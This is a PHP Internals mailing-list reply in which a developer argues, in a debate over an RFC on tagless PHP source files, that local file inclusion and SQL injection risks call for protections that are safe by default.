Hi, 2012/4/10 Luke Scott <l...@cywh.com>: >> It's easy to say "write correct code. don't write stupid code", but >> we cannot enforce it in real world. >> >> I'm concerning both arbitrarily script execution and arbitrarily >> information disclosure. Good example is LFI and SQL injection >> attack. > > Uh yeah there is. I won't employ someone who insists on writing code > like this. I dont know anyone who will. I also wont use libraries that > have code like this. Not only is it insecure but an improper use of > these constructs/functions.
Attackers are supposed to abuse features. Writing data into a file is RDBMS feature. Including file is PHP feature. Combined features could give great freedom to attackers stealing data and/or executing scripts. What we should consider is "proper protections". > All this has nothing to do with Tom's RFC. It has nothing to do with > having a <?php tag or not. https://wiki.php.net/rfc/source_files_without_opening_tag The RFC states "This RFC proposes a way to support source code files without <?php at the top." It has almost nothing to do LFI protection, though. > I would actually suggest that require/include stop supporting remote > files all together. But that can be a different RFC. > > This "security problem" isn't a problem with common sense. Requiring/Including remote file is not bad, just like embedded mode of PHP is not bad. They are bad for security if they are enabled by default or mandatory. Regards, -- Yasuo Ohgaki -- PHP Internals - PHP Runtime Development Mailing List To unsubscribe, visit: http://www.php.net/unsub.php